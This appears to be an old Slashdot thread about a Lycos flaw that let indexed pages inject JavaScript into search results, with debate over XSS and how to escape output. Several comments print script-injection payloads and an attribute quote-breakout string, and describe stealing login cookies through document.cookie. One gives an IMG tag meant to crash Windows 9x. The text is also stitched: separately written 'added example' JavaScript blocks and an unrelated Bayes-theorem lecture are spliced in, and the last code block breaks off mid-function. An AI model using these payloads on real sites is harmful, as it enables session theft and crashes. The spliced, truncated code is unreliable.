Security Hole Lets Lycos Run Arbitrary JavaScript
JibbaJabba writes "Securiteam is reporting that a "security vulnerability has been confirmed in Lycos's Search Engine" which "allows malicious web site owners to cause JavaScript code (or any other HTML code) to get included in the search results displayed to the end user by Lycos". They also state that "other engines are suspected to be vulnerable as well". Anyone tried google yet? The original bugtraq report by Sentry Labs is available here." Proof once again that the jerks have more spare time then the people who actually do something worthwhile.
Yeah, sure, Javascript is harmless. Click here for proof you're wrong.
Could someone use this to embed an HTML comment character in their description to prevent further search results from being displayed?
If jerking is outlawed, only outlaws will have jerks!
ECMAScript (formerly known as JavaScript) can in fact be used to propagate spam. It is widely deployed in freely downloadable browsers such as Netscape and Internet Explorer. It is turned on by default. Struggling eCommerce web sites use applets to gather valid email addresses. In one documented case a real estate agent presented a talk on how to use a JS applet to troll casual web site browsers for valid email addresses. The thought being that anyone who spends a fair amount of time browsing online real estate ads is probably looking for a house, so the return to the web site is valuable: pre-self-filtered valid email addresses. The next morning you wind up with mortgage spam, moving company spam, etc. It does not take much imagination to see where such marketing ploys will go if they fall into the wrong hands. Do you actually like spam? Do you want to see more of it clogging the 'net? Then be sure to surf without turning off JavaScript in your browser.
I don't think I'm buying into this "they are only showing you how bad your stupid code is" reasoning anymore. ALL code is flawed, so taking advantage of it is like pushing down someone you meet on the sidewalk and saying "I am only showing you how poor your center of gravity and sense of balance are!" No, that is not a reasonable line of thinking. If you want to make something better, show the makers what's wrong, and post publicly if it is not taken care of. All of the rest of this is some kind of ego-run-amuck b.s. about trying to _be_ "Neo" hacking "the man", and it is _very_ juvenile. I spend FAR too much of my time trying to make sure that my servers are patched and my virus files are up to date and my users are not sending out company data to outside sources that don't need to know. It takes away from a sysadmin's time that _should_ be spent watching company information flow and user environments to look for ways to help it improve the company, NOT making sure that the 13 year old kid that just got out of school isn't making sure I know that IIS has a buffer overflow problem that gives him all of my customers' credit cards. Not ALL information was meant to be free. If you disagree please feel free to apply for wireless service from Verizon or AT&T and learn all about how "helpful" these "security advisors" really are.
- A.P.
--
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
Then I would feel much less nervous, as a sysadmin.
I don't think there is another means presently known to redirect the user directly from the list of results within a search engine before the user ever actually clicks on any of the results. Maybe you misunderstood what I wrote or I wasn't clear in what I meant - or maybe I'm misunderstanding you now. How can you go about redirecting users from the page within the search engine that shows the first few results without using this Javascript exploit?
The things that I listed differ from the things listed by the original poster in that the original poster considered the most nefarious possibility of redirection to be an annoyance (in the same way that porn sites flood you with annoying popups [from what I've heard]) whereas I suggested that a much worse use of redirection would be to deceive the user. The key is that the user thinks he is still on Lycos when he is not, and this opens up a whole can of worms. Perhaps you consider this "harmless" because you think people who don't look up at the URL location of each web page they visit are stupid, but when you click on the "Search" button of your favorite search engine how many times do you look up at the location to see that the results are indeed from where you expect?
The third possibility you mention is not likely at all to work as people don't have to login to use a search engine.
Lycos does have web based email, which quite a few people use, and I think they have some other services that require registration as well. I would wager (based on Bayes' theorem) that people using Lycos for searching are more likely to have Lycos webmail accounts than the average internet user.
-----
Free P2P Backup, Windows & Linux
Redirection could be used for more than just annoying purposes. The thought can comes to my mind right away is that it could be used for deceptive purposes:
And more to the point, since JavaScript can read cookies, any active logins to the search engine site could be sent by the rogue JS to a third party.
--
"Hot lesbian witches! It's fucking genius!"
When vendors ship operating systems that are inherently insecure, they're loudly blasted for doing such, and the administrators of those systems are often held responsible for "locking down" the default-insecure configuration. This is considered well, good, and normal by a great many folks, esp. here on /.
It may be that 90% of the people out there don't know what Javascript is, but I should hope that the percentage of /.ers that don't know anything about Javascript would be far, far, far less. I may be wrong (in fact, I probably am, considering that at least one person thought my original comment was a troll -- they're probably thinking "JAVASCRIPT RULZ DOODZ! U SUX!" when they read anything critical of Javascript or other client-side code), but I hope not.
You can't really blame the graphical browser vendors. Many sites require javascript to do trivial operations: to follow a link, to submit a form, etc. Many of the same end-users who don't know what Javascript is or that you CAN turn it off end up being those who shout for it loudest when it is disabled. It's scary when someone, in all apparent seriousness, claims that they use $BROWSER[A] because $BROWSER[B] allows Javascript to be disabled, and they don't think that's right.
A couple of times I've pushed further, and learned that "well, the web-developers wouldn't use it unless it was safe, so you're just full of it when you say that there are risks involved!" -- and I imagine that most of the folks who write Javascript do so because they need it to provide the behavior required by those same users.
So, yes, it's a bit much to expect any one newbie to know enough to disable Javascript. But that shouldn't apply here, right?
As I said, this isn't anything unexpected. Those who pay attention already disable Javascript and go around making sure the folks they care about know that Javascript can be disabled. So anyone that anyone on /. knows that has Javascript enabled either has (1) done so knowing the risks or (2) has really crappy friends/acquaintances.
Personally, I'd be happy to have a Javascript Guru devise a better resource-consumption script than what I currently have:
Pick One: http://www-rohan.sdsu.edu/~stremler/sigs/sigs.html (Note - disable Javascript first!)
Stupid Slashdot. I tell it i want "Plain Old Text", but it still thinks < and > surround tags, and that &lt; and &gt; are symbol codes. Sigh.
My middle paragraph should read:
Unfortunately, the Lycos bug is exactly the opposite. Instead of them taking < and >s, and failing to turn them into &lt; and &gt;, the problem is that Lycos is finding web pages with &lt; and &gt;, and turning them into < and >, thus changing non-HTML into HTML. A much less common problem, and also one it seems like they have TRIED to create. Why parse the HTML symbol codes into the symbols they represent? It's a strange bug, and its obscurity is why it's taken so long to come to light.
One could assume that you're not a grammar consultant.
Great job, you really addressed 90% of the issues with stupid CGI programmers. I have dealt with the same problem in CGI that I've "inherited", and it's a pain in the ass to see such a simple exploit go unpatched.
Unfortunately, the Lycos bug is exactly the opposite. Instead of them taking < and >s, and failing to turn them into &lt; and &gt;, the problem is that Lycos is finding web pages with &lt; and &gt;, and turning them into < and >, thus changing non-HTML into HTML. A much less common problem, and also one it seems like they have TRIED to create. Why parse the HTML symbol codes into the symbols they represent? It's a strange bug, and its obscurity is why it's taken so long to come to light.
One thing to note, though, is that this bug probably would have been found months, if not years, ago if Lycos was OSS.
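The decode-before-output mistake the posts above describe, as an added example that is not code from the thread, from Lycos, or from anyone quoted here: a toy results renderer in JavaScript runs an entity decoder over crawled page text and writes the result straight into the page, beside a fixed version that encodes the text instead. The renderer, the sample crawled page and the `hasLiveScriptTag` check are all constructed for this illustration.

```javascript
// Added example, not code from the thread, from Lycos or from anyone quoted.
// It reproduces the shape of the bug the posts describe: crawled page text is
// run through an entity decoder and written into the results page, so a page
// whose visible text merely shows "<script>" as &lt;script&gt; ends up
// inserting a live script tag into the search results.

// Minimal entity decoder standing in for whatever the results page ran over
// crawled text. The fact that it decodes at all is the mistake.
function decodeEntities(s) {
  return s
    .replace(/&lt;/gi, '<')
    .replace(/&gt;/gi, '>')
    .replace(/&quot;/gi, '"')
    .replace(/&amp;/gi, '&');
}

// Encode the characters that have meaning in HTML text and attribute values.
// & goes first so already-encoded input is not double-encoded twice over.
function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// Bug reproduction: decode, then drop the text straight into markup.
function renderResultVulnerable(title, description) {
  return `<li><b>${decodeEntities(title)}</b><br>${decodeEntities(description)}</li>`;
}

// Fix: crawled text is data; encode it for the HTML text context. An "&lt;"
// in the source page becomes "&amp;lt;" here, so the browser displays the
// literal characters exactly as the original page did.
function renderResultSafe(title, description) {
  return `<li><b>${escapeHtml(title)}</b><br>${escapeHtml(description)}</li>`;
}

// Does the rendered fragment contain a script start tag a browser would run?
function hasLiveScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample: a crawled page whose text legitimately shows escaped
// markup (say, a tutorial about HTML), with a harmless alert as the payload.
const crawled = {
  title: 'How to write HTML',
  description:
    'Use &lt;b&gt; for bold. &lt;script&gt;alert(\'nasty popup\')&lt;/script&gt; shows a script tag.',
};

function demo() {
  const bad = renderResultVulnerable(crawled.title, crawled.description);
  const good = renderResultSafe(crawled.title, crawled.description);
  console.log('vulnerable:', bad, '-> live script?', hasLiveScriptTag(bad));
  console.log('fixed:     ', good, '-> live script?', hasLiveScriptTag(good));
}
demo();
```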
Extraordinary Vacations. Exceptional Prices
just think.
The danger comes from sites that base their authentication schemes on persistent cookies after the user has signed-on once.
Such a cookie basically tells the server "hey I'm the right guy, now gimme my personalized page".
You can use javascript to sniff the cookie via document.cookie and send that value to a cgi script that'll store it.
heh fun.
Once the user would click on that link, it would take them to the spell-checker interface of hotmail, but the 'word' passed to that CGI is actually HTML code that gets "echo'ed" as part of the "result page", just like any dictionary interface would do. That HTML code could be a SCRIPT tag downloading a .js javascript file from the perpetrator's server (to keep it clean) which could very well sniff a user's document.cookie and change the location of some hidden image on the page or pop a window by making an HTTP request to some evil CGI and passing the value of that document.cookie string as a parameter and store it in some text file.
The victim's cookie string most likely contains information that tells the server "hey i'm authenticated" so all it takes is for the evil person to reproduce that cookie.
As I browse the web, I find such vulnerabilities on member-driven sites all the time; sometimes I warn the webmaster, sometimes I don't bother, but it can potentially be pretty nasty. I even got a t-shirt from some mildly popular online community fedexed to me once after I rode their asses like a madman so they'd finally plug a really *really* bad similar hole.
I found one in some remote feature of Yahoo a few weeks ago, but it's very small and I doubt anyone else would find it.
The rule of thumb to always follow as you design your web application is "what is that HTML I'm sending to the user made of?", "is there any content in there that is taken from any kind of user input?", "if yes, am I filtering out all angle brackets?", "if I am allowing for user-input HTML content, am I filtering all unnecessary tags, and among the tags I'm allowing am I filtering all unnecessary attributes (onload, onmouseover, onclick)?"
A troll, on the other hand, is sometimes disguised as a somewhat coherent expression of opinion but doesn't really represent the poster's opinion, it's just designed to get a lot of people worked up replying to it so that the original poster can laugh at them wasting their time and tell himself how clever he is for having done so.
What they have in common is the level of maturity (low) and the lack of positive contribution to the discussion.
And then there are the 12 year olds who keep trying to sneak in links to stuff other than that to which the link appears to lead, and all the other posts associated with those posts, which are just another immature attempt to annoy people and waste their time. Off-topic covers these just fine.
None of this necessarily has anything to do with how posts actually get moderated.
I see even classic Slashdot is now pretty much unusable on dial-up.
That's a bit disingenuous. JavasCrypt is enabled by default in all graphical browsers. 90% of people out there don't even know what it is, much less how to turn it off (turning it off in Netscape is fairly easy, but turning it off in IE is extremely non-obvious, even if you know you're looking to kill JavaScript).
Schwab
Editor, A1-AAA AmeriCaptions
3. Bayes Theorem. A probabilistic method of medical reasoning.
This can tell you something about the probability of 1 person having a disease because it gives you the probability of the population having the disease.
This can tell you how accurate a positive or negative test outcome is. (The sensitivity can tell you how often the test will be positive in a person with disease; the specificity can tell you how often the test will be negative in a person without disease.)
This is a way to decide how to treat disease by knowing about the rate of the disease and how good your test is.
Diagnosis based on:
Prior Odds (or base rate of disease)
Characteristics of a diagnostic test (sensitivity and specificity)
Here is a scenario: You work in an area with a relatively high rate of Lyme disease. You have a test for Lyme disease and a patient you want to test. You could decide whether your patient has Lyme disease simply on how common Lyme disease is (prior odds). With the test as the diagnostic tool, you could only base your diagnosis on the outcome of the test and how good the test is. Using both pieces of information is a better approach.
Know Sensitivity and Specificity. (As defined in the basic experimentation lecture)
Bayes Theorem can also help you to update your decision-making when new info comes around.
Search first, ask questions later.
Wait a sec. If girls only go out with jerks, and never with "nice guys," that would mean that sys admins would be getting all the girls. And I know that ain't so.
I dunno, I'm not sure that a little 69 really ever caused anyone harm.
-josh
That's it. End of story. If browsers let you do that, we'd all be happy.
What? I can't? Shoot, I'd better turn that off then! :-)
Konqueror has exactly this option - you can tell it to disallow opening new windows completely, to have it ask, or to allow javascript window.open() always. Handy little feature...
---
Hacker Public Radio is our Friend
How about "wrong story" instead? How did this get moderated up, anyway?
Remember: it's a "Microsoft virus", not an "email virus",
Your right to not believe: Americans United for Separation of Church and
"Search warrant."
Fly away, little BSA bird.
I am very small, utmostly microscopic.
Hyper Text Markup Language
it's a stateless language, but a language nonetheless.
Just raise the taxes on crack.
jeez, thank goodness you're on the good side, or at least it would seem..
I am a believer in the thin-client approach to web-pages and that is if you can't do it on the server and you can't use HTML for your web page then you are probably doing something wrong. This is my opinion and you don't have to share in it.
Jumpstart the tartan drive.
And re-read Steven Levy's book Hackers while you're at it.
--
Poliglut
Plus, it's faster then NS4 rendering /. in nested mode!
Pope
What? Bear is driving car? How can that be?!
It doesn't mean much now, it's built for the future.
Proof is a noun. Prove is a verb. Keep that in mind, will ya?
That's a bit disingenuous. JavasCrypt is enabled by default in all graphical browsers. 90% of people out there don't even know what it is, much less how to turn it off (turning it off in Netscape is fairly easy, but turning it off in IE is extremely non-obvious, even if you know you're looking to kill JavaScript).
In IE, it's under Security, which is the obvious place to have it. Particularly if you don't know *what* Javascript is; all you have to do is set your security to high - you don't have to worry about the details.
Simon
Coming soon - pyrogyra
That's correct. To really annoy Win9x users, just put an <IMG> tag in your websites with the SRC set to "file://c:/con/con" like this:
<IMG SRC="file:/c://con/con">
How does *Microsoft* force you to enable cookies to view *Starbucks*?! Cookies were invented by Netscape anyway, you know, and there's absolutely nothing unsafe or strange about them despite all the FUD.
A cookie set by a server can only be read by that same server. The exact same effect can be done by URL rewriting (adding a token to each URL, as in /something.php3 becomes /something.php3?youAre=dude123) and every link adds that ?youAre=dude123 part to it. You can now be identified between link clicks. 99% of all cookies are simply used for session tracking. Only idiot programmers would actually store any DATA of relevance in them (like a credit card number, home address etc.)
Not all the facts were stated by the person to which you replied. Windows XP Home Edition does not feature different access levels. All users are Administrators. Windows XP Professional retains different access levels.
See: http://www.microsoft.com/windowsxp/guide/comparison.asp
"Be Happy or Die." -- AoN
Konqueror has exactly this option - you can tell it to disallow opening new windows completely, to have it ask, or to allow javascript window.open() always. Handy little feature...
OmniWeb for OS X has it beat, with a setting to open the window only if it was requested by a user action. I can go to a site like the The Onion and have its left-hand bar popups like Horoscopes open just fine, but I have never, ever seen a popup ad.
If you want to see javascript abuse in action, go to somethingawful.com and look for an awful link of the day. If there's a guestbook available, you'll see dancing goatse guys and everything. Er, wait, nevermind.
Imagine, you do a search, and while you're sitting there looking at the search results, you get popup ads being generated by the sites in your results list. Now imagine that the search hit a lot of porn sites. And they have exit traps.
Hopefully, the search engines get this remedied quickly. I imagine they'll just filter out javascript.
-Todd
---
"The details of my life are quite inconsequential..."
Automatic JavaScript on and off based on URL might be OK, but I want a button down in my tray where I can easily turn it on and off -- with, of course, indication of state.
Slashdot rumor has it that Microsoft toyed with this idea for a while and then dropped it when it internally became known as the "porn button". Vote for (or help us fix) one or both of these if you'd like to see the feature added to Mozilla:
bug 38521 Preferences Toolbar, for most commonly used prefs
bug 87538 [RFE] preferences buttons on status bar
The shareholder is always right.
Even if you did that, a web site that found a major security hole in your browser would be able to steal your Slashdot password...
don't forget to change a quote (") into &quot;
And it might also be a good idea to turn & into &amp; while you're at it.
Btw, I don't think you need to do the < and > transformations for attributes, but it doesn't hurt.
This link is a fine example... difficult to get out of on Microsoft browsers.
Only on Microsoft browsers? I don't remember finding a browser where I could get out of that kind of loop.
See bug 59314, "Alerts should be content-modal, not window-modal", for fixing this in Mozilla.
Cmon, that's just sloppy.
:).
<? $page_description = strip_tags($page_description);?>
Problem solved.
I love PHP
Ya think? PHPLIB has been OSS for a long time, and only recently were programming problems of the above type found in it.
OSS isn't the magic elixir. It's a step in the right direction.
You also forgot that you need to remove quotes as well.
When it helpfully fills in a text box, you have to escape the quotes. Take this example:
Now we craft the malicious string ( " onfocus="alert('howdy'); ) and place it in the text box like so:
See also my article on Accepting input and malicious script insertion.
Lots of sites are vulnerable. Lots of sites have lazy developers.
I can't seem to find the relevant logical definiendum and differentia in the Jargon File or elsewhere. What exactly is the difference between flamebait and a troll?
--
NetInfo connection failed for server 127.0.0.1/local
and that quote illustrates why. If you live in a small town where nobody locks the doors, it's not reasonable to walk into someone's house uninvited. If you connect your computer to a global network and program it to accept TCP connections on certain ports, it is reasonable for people all over the world to connect to those ports.
I wonder if Stoll originated the nonsensical comparison between 'unauthorized access' of a corporate/governmental computer and breaking into someone's house. They're not the same at all, but this silly notion underpins a lot of bad thinking and bad law. Stoll was zealously protective of the 'computing resources' of a huge government lab at a time when 'real computers' were out of reach for ordinary people. He could be compared to a royal chef in the middle ages urinating on the excess food from the royal table lest a commoner eat it.
I don't agree that security problems have made the web 'experts only'. If you want to run your own web server and you're not an expert, run vanilla Apache and sshd and nothing else. Actual holes in Apache are pretty rare. Or am I missing your point?
Rubbish.
1) Where was it getting the email address from? If the user typed it in it's their fault, and I fail to see where else it would get it from.
2) There's no such thing as a JS "applet". Applet refers to a client side embedded Java application, no relation to JS at all.
---- One button is the power button, the other is the Bender voice button "Bite My Shiny Metal Ass"
Nowadays when I build forms I always set a max length. This keeps people from doing the things I did when I was 15
Hollow words will burn and hollow men will burn.
This article was just posted, but then disappeared from the home page. Interesting.
Got Rhinos?
This isn't a serious security breach, just an annoying oversight by Lycos programmers which will probably be patched up in the next fifteen seconds.
I sent my friend to Yaromat's "Wanna be an apple?" when he was stoned and he damn near had a heart attack.
XML is like violence. If it doesn't solve the problem, use more.
The javascript hole doesn't work on google, but I found an even worse bug that allows you to pass along ASM in a search string!
Sure can't. The most that can be done is the playing of sounds on an end user's hardware. Beyond that nope..
/think ;)
Gotta love random
Jeremy
In a browser, VBScript is harmless.
Don't confuse VBScript with an ActiveX control
They are totally different.
And of course if you can get a VBScript to the Windows Script Host it's all over but the crying... doing that from a browser is something I'd like to see however
Jeremy
*sigh*
In the context of the browser VBScript executes with the same permissions as JavaScript... PERIOD!
You can't create a file system object using a VBScript in a browser. It takes more than most people think to damage a machine with just VB/JavaScript. You have to use "social" engineering more than anything and trick people more than you can directly harm their systems.. think about it
Why don't you show me some VBScript run from a web page that can do something malicious. I'll gladly run it on my machine and click NO if it's an ActiveX object and simply laugh at anything else since it simply WON'T work in the browser.
Outlook has totally different access privileges; why do you think all of these worms are spread? Do you know the mayhem that would be caused if every IE browser was exploitable via VBScript?
Stop and think before trashing something for an unfounded reason.
Jeremy
I think a lot of those of us who post to slashdot would be in trouble if jerks were outlawed.
I'd certainly flee to Canada if that happened.
But then Canada would be populated with jerks...
Perhaps we could all flee to Australia? Then Australia would have THREE social classes -- descendants of British "criminals," aborigines, AND jerks!
Bah, nevermind...
That's a bit disingenuous. JavasCrypt is enabled by default in all graphical browsers.
Actually that's not quite true. Konqueror very deliberately keeps JavaScript, Java and Netscape plugins off by default. If you need them, then it's a cinch to enable them (very obvious in the Konqui settings dialog, or, if you have the extra plugins that are in the kdenonbeta package, it's even simpler, select a menu item or a toolbar button).
If you're concerned about turning JavaScript on globally, then you can enable/disable JavaScript (and Java) on a per-site basis.
Sigh... If only every graphical browser put security first...
--
I'd rather be lucky than good.
"Proof once again that the jerks have more spare time then the people who actually do something worthwhile."
Don't be so hard on yourself there CmdrTaco! We read your drivelous comments just the same 8^}
And BTW - it's 'than' the people, not 'then' the people.
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
And if you're putting the results in <INPUT TYPE="TEXT" VALUE="Something The User Entered"> don't forget to change a quote (") into &quot;. Otherwise you can still get weird results, especially because you can insert new attributes (maybe do something even via onclick="something_nasty()" at that!)
--
You are in a maze of twisty little relative jumps, all alike.
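An added example for the quote-escaping point made just above about INPUT VALUE, and for the earlier strip_tags post that the `" onfocus="alert('howdy');` string answers; it is not code from the thread or from any site it names. A JavaScript imitation of strip_tags is applied to a refilled search box beside proper output encoding, with a small attribute scanner to show which attributes each version actually hands the browser. All function names and sample inputs are constructed for this illustration.

```javascript
// Added example, not code from the thread or from any site it names.
// Stripping tags is not enough when user input is echoed inside an attribute
// value: a bare quote closes the VALUE and whatever follows becomes a new
// attribute. Encoding & < > " for the attribute context closes the hole.

// Crude imitation of PHP's strip_tags(): drop anything that looks like a tag.
// Note that it leaves quotes alone, which is the whole problem.
function stripTags(s) {
  return s.replace(/<[^>]*>/g, '');
}

// Encode the characters with meaning in HTML text and in double-quoted
// attribute values. & goes first so already-encoded text is not doubled.
function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// A search form that refills the text box with the previous query.
// Vulnerable variant: tags are stripped, quotes survive.
function renderSearchBoxStripOnly(query) {
  return `<INPUT TYPE="TEXT" NAME="q" VALUE="${stripTags(query)}">`;
}

// Fixed variant: the value is encoded, so a quote cannot end the attribute.
function renderSearchBoxEscaped(query) {
  return `<INPUT TYPE="TEXT" NAME="q" VALUE="${escapeHtml(query)}">`;
}

// Small attribute scanner for a single tag with double-quoted values, used to
// show which attributes a browser would actually see on the rendered element.
function attributeNames(tag) {
  const names = [];
  const re = /([A-Za-z][\w-]*)\s*=\s*"[^"]*"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True when the rendered tag grew an on* event-handler attribute.
function hasEventHandler(tag) {
  return attributeNames(tag).some((n) => n.startsWith('on'));
}

// Constructed inputs: the breakout string discussed in the thread, a query
// with real tags in it, and a harmless query containing an ampersand.
const samples = {
  breakout: '" onfocus="alert(\'howdy\');',
  tagged: '<b>bold</b> search',
  benign: 'fish & chips',
};

function demo() {
  for (const [name, q] of Object.entries(samples)) {
    const stripped = renderSearchBoxStripOnly(q);
    const escaped = renderSearchBoxEscaped(q);
    console.log(`${name}: strip_tags only -> ${stripped}`);
    console.log(`  handler injected? ${hasEventHandler(stripped)}`);
    console.log(`${name}: encoded         -> ${escaped}`);
    console.log(`  handler injected? ${hasEventHandler(escaped)}`);
  }
}
demo();
```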
For the love of Jebus, with all the ways JavaScript can be abused, why don't the browsers come with a way to filter out the most obnoxious actions? I'd love to see checkboxes for the following.
Disallow new window creation
Disallow window moving and resizing
Disallow redirection
Disallow shortcut creation
[I nearly blew a gasket the first time I found that a site had placed porn and casino links in my Start menu.]
Disallow access to cookies
There are probably others, I'm no JavaScript whiz.
An ideal browser would let you toggle all that stuff, and then enable it for specific sites of your choosing.
I'll have to look at Web Washer again... maybe it lets you re-enable pops for the sites that need them.
Does "other HTML code" include ? If it does... poor IE users.
I think you underestimate just how much I just dont care.
I've never seen so many mistakes in one sentence. The irony of the title of that post has officially blown my mind.
Where are we going and why am I in this handbasket?
<a href="friskit.com"> <img border=0 src="http://friskit.com/site/images/logo.gif"> </a> <script> document.body.style.filter= "progid:DXImageTransform.Microsoft.Blur (pixelradius=3)"; </script>
No. It's proof that dotcommers are in such a rush to be first and get all kinds of attention that they are sloppy. Maybe if we all stop trying to accomplish everything at the pace of eBusiness, this sort of nonsense will get caught in the process.
I do not have a signature
It's not a goatse link. It goes to altavista.com.
wow. once again I recall why I avoid windows ie. :) (posting from macos 9.1, ie5)
um. inside ie, you can selectively discriminate between sites for javascript. you can setup Trusted Sites which get to run JS and ban others.
actually, JS can't create shortcuts. that'd have to be one of the other IE scripts, jscript or vbscript or something.
my old sig used to be funny, but then slashcode ate it and now it's not funny anymore
dejanews? have you been paying close attention to news on google's site in the past year or two? :)
hey, at least lycos hasn't been bought yet. sure it sucks but... ;)
"No really, it just appeared on my screen"
"Son, I know better than that, now go to your room!"
Burn Hollywood Burn
CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
From how I understood the advisory, it refers to a page that automatically displays info directly from a link, like showing the search string on the search results page. If the displayed string contains script, the script will be executed in the client browser.
----
searching Lycos for:
:-)
<b>Oooh+Bold+Text </b><script>alert('Ew ww nasty popup')</script>
was good for a laugh
"The Most Fun Possible on 4 wheels" is at SunBuggy in Las Vegas
No code is flawless. That doesn't mean all code is equally flawed as you seem to be suggesting!
You either knew you'd be working with IIS when you took the job, or you suggested IIS yourself, or you stood idly by and let your boss walk all over you and dictate that you install it. So quit complaining about your sad but entirely avoidable situation. Especially since you probably earn extra money for having to put up with Microsoft products instead of actually enjoying your work like many of us do. I mean, sure, it's tough if applying the weekly IIS patch is interfering with your "watching company information flow and user environments to look for ways to help it improve the company" [translation: configuring the firewall so you can play Quake from your office] but applying those hourly NT patches IS YOUR JOB, in a way that whining on Slashdot is not.
Running NT on a public network of any kind is like bending over to pick up soap in the prison shower. I'm continually amazed at the outrage, incredulity, and disbelief I hear from people who have chosen to install server software that seems to have been written from the ground up to support remote execution of worm code by sociopathic teenagers.
This reminds me of some stuff my wife encountered while receiving messages through Yahoo Mail. Whenever someone used the word "medieval" in the message body of an email, Yahoo replaced it with
medireview
and it would show up that way in the browser. So she thought nothing of it until she noticed that Yahoo also changed the word expression into statement! So if someone wrote
Medieval art was limited in its expression
in an email, Yahoo turned it into
Mediereview art was limited in its statement
So she wrote Yahoo asking them what was up. This was their response:
Hello,
Thank you for writing to Yahoo! Mail. To help ensure the highest level of security, words that can be interpreted as JavaScript commands are replaced by an alternate word (with the same or similar meaning) when using HTML formatted email. This also happens when viewing documents using our HTML file viewer.
JavaScript should be taxed!
I don't know if this thread is on the security of Lycos or the security and handling of scripting. So about Lycos. They're just displaying links and descriptions so all scripting should be filtered out of their entries. They need to improve on their filtering methods.
Ok. There's been a lot of talk about all the bad in scripting. It's gotta have some good uses. I think it does.
For instance any type of use of dHTML needs some type of scripting involved. Forms that dynamically change content as it's being filled out are good as they save the user time and make it easier for them to fill out. 90% of the users I support only want to focus on the task at hand and not have to figure ways around doing that task. The biggest request I get is "Can it be made easier?"
That's how the business and user world is. And it's those two worlds that most of the internet is geared towards.
I think Microsoft was on to something with the whole OS as Browser thing but when it about it wrong. It should be the Browser as an OS. Here's what I would like to see happen.
A browser that implements scripts to run strictly inside the browser in a protected sandbox. The browser starts with a main top-level page, and any subsequent windows opened inside the browser open over the top-level page. The browser should have a setting for how many child windows can be opened at a time. (Opera seems to be headed in that direction, but the windows are either all maximized or not. Strictly MDI.) Scripts being able to be compiled to byte code. The browser should have an option that can be set as to whether or not it will start with a VM for scripts preinitialized for the byte code.
Kinda sounds like Java applets. But Java applets require too much overhead compared to scripts. A browser like I want will probably use more overhead too, but it will all be initialized when it is opened. Java provides some of the functionality, but there's one major problem I haven't overcome. I can't find any documentation that allows Java to get access to the full DOM. I've seen some on Sun's site, but it's very limited. If it had as much as scripting does, then I think it would be used more. Then you get a little more security than you can get with scripts. If anyone knows about this, please let me know.
.Net seems to be headed this way and to provide this, but I'm still checking and it's too early to tell yet. If so, aside from the subscriptions, it's a good thing.
My boss just asked me if I could look into directing traffic to our website.
Knowing this, I could index all of our pages with porn keywords and redirect users to our page selling Office Furniture!!!
I'll be sure I send out OfficeFurniture.vbs just in case Lycos fixes this hole before I get a chance at a promotion.
"Communism is like having one [local] phone company " - Lenny Bruce
Combine this with the payola that puts certain for-a-fee pr0n sites at the top of the list, and little Timmy doing a search for his latest book report on "naked singularity" is going to have 20 very confusing new windows pop up on his screen that make him have strange feelings faster than you can say "Tentpole".
Second, for everyone who's saying how harmless JavaScript is, you're somewhat right, but it doesn't matter. Why? Because the person releasing the vulnerability was just using JavaScript as an example. It could also be VBScript, just as easily...and THAT is NOT harmless by any stretch of the imagination. Imagine doing a search on Lycos, and getting smacked with a new variant of KAK.
For your security, this post has been encrypted with ROT-13, twice.
I was arguing that HTML is not a language in the programming language sense
Make It Secret . Free JavaScript implementation of AES for your browser
JS, on the other side, hasn't an easy way to access sensitive data or create malicious code. As someone noted before, you can redirect the user to a porn site or something, but it's rather difficult (I'm not a JS programmer, just done a couple of hacks with it) to access sensitive information, such as the hard drive.
A whole new way for annoying pop-up ads to advertise themselves. Before you even surf to the luzer website, BAM! there it is in front of your Lycos search!
If microsoft put this feature in IE it would disable their entire site.
www.facestat.com - See how strangers judge you.
The simple fact is that content you get from the Internet, be it Slashdot, Lycos, Microsoft, or anything else, may have been altered or may be malicious in itself. If you care about it, you have to deal with it by picking your web client to protect you; trying to insist that every web site is secure and trustworthy is a losing battle.
BTW, from the description of the bug, JavaScript is the least you have to worry about. ActiveX controls would seem like a much bigger problem. And web sites that serve user-supplied JavaScript through SSL are also a much bigger worry (since the user-supplied JavaScript is implicitly signed with the site certificate); at least Lycos doesn't serve its content through SSL.
This one's been around for years, and is present on literally millions of sites. I read somewhere that both AltaVista and Amazon have suffered from this in the past. Here's how it works:
You have some kind of form input, with the next page displaying whatever the user typed into that form field (for a search engine this would be in the form of "You searched for..."). The golden rule of web development is NEVER TRUST input from your users. Most developers go to great lengths to check anything that's going into a file or database, or especially code that will be executed on the command line.
However, if you're just going to display something to the user that typed it why bother checking the content? Surely only the user who typed the thing is going to see it again, and it's not like they're going to be able to affect any of your systems?
Therein lies the problem. If you allow a user to type anything into a form and then have it re-displayed, they can include HTML tags. And if they can include HTML tags, they can include <script> tags. And script tags can do weird stuff.
Still think it's not a problem thanks to the fact that only the user will see it? Think again - seeing as most applications like search engines use GET to pass parameters, you can fill in the form for the user by offering them a link to click:
http://yoursite.com/search?<b>Oooh+Bold+Text</b><script>alert('Ewww nasty popup')</script>
All of a sudden you can cause your weird popup messages to appear on someone else's site.
The biggest security problem is the fact that JavaScript can access cookies. Imagine sending someone to a website via a link containing JavaScript that reads their username/password cookie for that site, then pops up a window feeding that username/password to a script page on your server (in the query string) - BANG, you've got their password.
How do you stop this happening? Simple - deactivate HTML tags from user input by replacing < with &lt; and > with &gt; - problem solved.
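An added example, not code from the thread, from Lycos or from Yahoo, showing the two filtering approaches discussed above side by side: the reflected "You searched for..." page from the post just above, first as the vulnerable version and then with the entity-encoding fix (extended to `&` and quotes so the value is also safe inside an attribute), and a constructed stand-in for the Yahoo word-swap filter quoted earlier in the thread. The word list models only the two pairs visible on the page ("eval" to "review", "expression" to "statement") and is an assumption, not Yahoo's real list; the attacker link, the `attacker.example` host and the function names are likewise constructed for the demonstration.

```javascript
// Added example (not code from the thread, Lycos or Yahoo).

// Encode the five characters that can change HTML context. This is the
// "replace < with &lt; and > with &gt;" fix from the post, extended to
// & and quotes so the value is also safe inside an attribute.
function escapeHtml(s) {
  return String(s)
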